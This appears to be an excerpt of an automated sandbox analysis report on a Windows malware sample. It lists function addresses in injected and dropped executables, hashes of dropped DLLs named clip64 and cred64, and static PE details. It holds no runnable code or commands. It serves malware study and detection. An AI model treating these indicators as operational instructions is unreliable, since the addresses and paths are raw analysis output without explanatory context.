                          Source: C:\Windows\explorer.exeCode function: 5_2_0B01C4045_2_0B01C404
                          Source: C:\Windows\explorer.exeCode function: 5_2_0B011C245_2_0B011C24
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B17F05_2_0C5B17F0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B72C05_2_0C5B72C0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5C52C05_2_0C5C52C0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D54D05_2_0C5D54D0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7D405_2_0C5B7D40
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5DADD85_2_0C5DADD8
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7DD75_2_0C5B7DD7
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7DCD5_2_0C5B7DCD
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7DFD5_2_0C5B7DFD
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7DF35_2_0C5B7DF3
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7DEB5_2_0C5B7DEB
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7DE15_2_0C5B7DE1
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5C37145_2_0C5C3714
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5DC7B05_2_0C5DC7B0
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5DD0045_2_0C5DD004
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D28245_2_0C5D2824
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5DE9325_2_0C5DE932
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D51205_2_0C5D5120
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5DA1F85_2_0C5DA1F8
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5DE2005_2_0C5DE200
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D0A285_2_0C5D0A28
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D2ABC5_2_0C5D2ABC
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D9BD45_2_0C5D9BD4
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5D03E85_2_0C5D03E8
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF67352345C6_2_00007FF67352345C
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF6735220486_2_00007FF673522048
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB5345C8_2_00007FF6FDB5345C
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB520488_2_00007FF6FDB52048
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B52345C9_2_00007FF63B52345C
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B5220489_2_00007FF63B522048
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102DFBD811_2_00007FF7102DFBD8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E5C7411_2_00007FF7102E5C74
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C100011_2_00007FF7102C1000
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E518C11_2_00007FF7102E518C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D91B011_2_00007FF7102D91B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102DD20011_2_00007FF7102DD200
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E8A3811_2_00007FF7102E8A38
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D128011_2_00007FF7102D1280
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D0A6011_2_00007FF7102D0A60
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D7AAC11_2_00007FF7102D7AAC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C8B2011_2_00007FF7102C8B20
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E0B8411_2_00007FF7102E0B84
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E33BC11_2_00007FF7102E33BC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D73F411_2_00007FF7102D73F4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D148411_2_00007FF7102D1484
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D0C6411_2_00007FF7102D0C64
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D2CC411_2_00007FF7102D2CC4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102DCD6C11_2_00007FF7102DCD6C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C95FB11_2_00007FF7102C95FB
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D0E7011_2_00007FF7102D0E70
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E4F1011_2_00007FF7102E4F10
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102DFBD811_2_00007FF7102DFBD8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D1F3011_2_00007FF7102D1F30
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E572811_2_00007FF7102E5728
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E2F2011_2_00007FF7102E2F20
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C9FCD11_2_00007FF7102C9FCD
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C979B11_2_00007FF7102C979B
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D504011_2_00007FF7102D5040
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102DD88011_2_00007FF7102DD880
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D107411_2_00007FF7102D1074
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102D28C011_2_00007FF7102D28C0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E5C7416_2_00007FF7102E5C74
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E4F1016_2_00007FF7102E4F10
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C100016_2_00007FF7102C1000
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E518C16_2_00007FF7102E518C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D91B016_2_00007FF7102D91B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102DD20016_2_00007FF7102DD200
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E8A3816_2_00007FF7102E8A38
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D128016_2_00007FF7102D1280
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D0A6016_2_00007FF7102D0A60
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D7AAC16_2_00007FF7102D7AAC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C8B2016_2_00007FF7102C8B20
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E0B8416_2_00007FF7102E0B84
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E33BC16_2_00007FF7102E33BC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D73F416_2_00007FF7102D73F4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102DFBD816_2_00007FF7102DFBD8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D148416_2_00007FF7102D1484
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D0C6416_2_00007FF7102D0C64
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D2CC416_2_00007FF7102D2CC4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102DCD6C16_2_00007FF7102DCD6C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C95FB16_2_00007FF7102C95FB
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D0E7016_2_00007FF7102D0E70
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102DFBD816_2_00007FF7102DFBD8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D1F3016_2_00007FF7102D1F30
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E572816_2_00007FF7102E5728
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E2F2016_2_00007FF7102E2F20
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C9FCD16_2_00007FF7102C9FCD
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C979B16_2_00007FF7102C979B
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D504016_2_00007FF7102D5040
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102DD88016_2_00007FF7102DD880
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D107416_2_00007FF7102D1074
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102D28C016_2_00007FF7102D28C0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE265E6416_2_00007FFEEE265E64
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1CFF6016_2_00007FFEEE1CFF60
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C2FA016_2_00007FFEEE1C2FA0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1CD03016_2_00007FFEEE1CD030
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1EF00016_2_00007FFEEE1EF000
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE232C4816_2_00007FFEEE232C48
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE268DF816_2_00007FFEEE268DF8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1F0E1516_2_00007FFEEE1F0E15
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE232A6816_2_00007FFEEE232A68
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1DDAC016_2_00007FFEEE1DDAC0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C5B5C16_2_00007FFEEE1C5B5C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1CFBE016_2_00007FFEEE1CFBE0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE227BFC16_2_00007FFEEE227BFC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C885416_2_00007FFEEE1C8854
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1D28B016_2_00007FFEEE1D28B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C26F816_2_00007FFEEE1C26F8
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1D16D016_2_00007FFEEE1D16D0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE20274016_2_00007FFEEE202740
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1CF52016_2_00007FFEEE1CF520
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1DF5A416_2_00007FFEEE1DF5A4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C327416_2_00007FFEEE1C3274
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1E62D016_2_00007FFEEE1E62D0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C233C16_2_00007FFEEE1C233C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1D030016_2_00007FFEEE1D0300
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1C831016_2_00007FFEEE1C8310
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1CC36016_2_00007FFEEE1CC360
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1E238416_2_00007FFEEE1E2384
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1EC42916_2_00007FFEEE1EC429
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE2500BC16_2_00007FFEEE2500BC
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1DD12016_2_00007FFEEE1DD120
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE1E120016_2_00007FFEEE1E1200
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD263016_2_00007FFEF5DD2630
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD521C16_2_00007FFEF5DD521C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD1A8016_2_00007FFEF5DD1A80
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD314016_2_00007FFEF5DD3140
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD2D3016_2_00007FFEF5DD2D30
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD3CF016_2_00007FFEF5DD3CF0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD37B016_2_00007FFEF5DD37B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF5DD1A8016_2_00007FFEF5DD1A80
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6556AE416_2_00007FFEF6556AE4
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6552DD016_2_00007FFEF6552DD0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6C9D13016_2_00007FFEF6C9D130
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEF6C971CC16_2_00007FFEF6C971CC
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_00F7DC7417_2_00F7DC74
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_050AEE5817_2_050AEE58
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_050A885017_2_050A8850
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_050A000617_2_050A0006
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_050A004017_2_050A0040
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeCode function: 17_2_050A884017_2_050A8840
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004B61F018_2_004B61F0
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004B51A018_2_004B51A0
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004E331018_2_004E3310
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004F63C418_2_004F63C4
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004B545018_2_004B5450
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004F64E418_2_004F64E4
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004ED55918_2_004ED559
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004F473718_2_004F4737
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DBBB018_2_004DBBB0
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004ECDCD18_2_004ECDCD
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004DFDCB18_2_004DFDCB
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004B4EF018_2_004B4EF0
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004F1FC718_2_004F1FC7
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_003061F019_2_003061F0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_003463C419_2_003463C4
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_003464E419_2_003464E4
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0034473719_2_00344737
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0033CDCD19_2_0033CDCD
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_00304EF019_2_00304EF0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_003051A019_2_003051A0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0033331019_2_00333310
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0030545019_2_00305450
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0033D55919_2_0033D559
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032BBB019_2_0032BBB0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0032FDCB19_2_0032FDCB
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_00341FC719_2_00341FC7
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_003061F020_2_003061F0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_003463C420_2_003463C4
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_003464E420_2_003464E4
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0034473720_2_00344737
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0033CDCD20_2_0033CDCD
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_00304EF020_2_00304EF0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_003051A020_2_003051A0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0033331020_2_00333310
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0030545020_2_00305450
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0033D55920_2_0033D559
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0032BBB020_2_0032BBB0
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0032FDCB20_2_0032FDCB
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_00341FC720_2_00341FC7
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dll C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dll B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: String function: 004DAC60 appears 56 times
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: String function: 004D4640 appears 136 times
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: String function: 00007FF7CDC41050 appears 106 times
                          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF68DEA1050 appears 106 times
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: String function: 00007FF673521050 appears 106 times
                          Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF63B521050 appears 106 times
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00338B3C appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 0032A414 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00324640 appears 272 times
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 0032AC60 appears 112 times
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00332B28 appears 52 times
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: String function: 00007FF7102C2760 appears 36 times
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: String function: 00007FF7102C25F0 appears 100 times
                          Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF6FDB51050 appears 106 times
                          Source: api-ms-win-core-localization-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-util-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-console-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-synch-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-file-l2-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-synch-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-timezone-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-namedpipe-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-datetime-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-locale-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-convert-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-conio-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-time-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-memory-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-handle-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-runtime-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-process-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-sysinfo-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-filesystem-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-heap-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-errorhandling-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-processthreads-l1-1-1.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-string-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-utility-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-profile-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-processthreads-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-processenvironment-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-environment-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-interlocked-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-debug-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-stdio-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-libraryloader-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-file-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-file-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-math-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-crt-heap-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-string-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: api-ms-win-core-rtlsupport-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                          Source: mggoBrtk9t.exeBinary or memory string: OriginalFilename vs mggoBrtk9t.exe
                          Source: mggoBrtk9t.exe, 00000000.00000003.1322744379.0000000000710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs mggoBrtk9t.exe
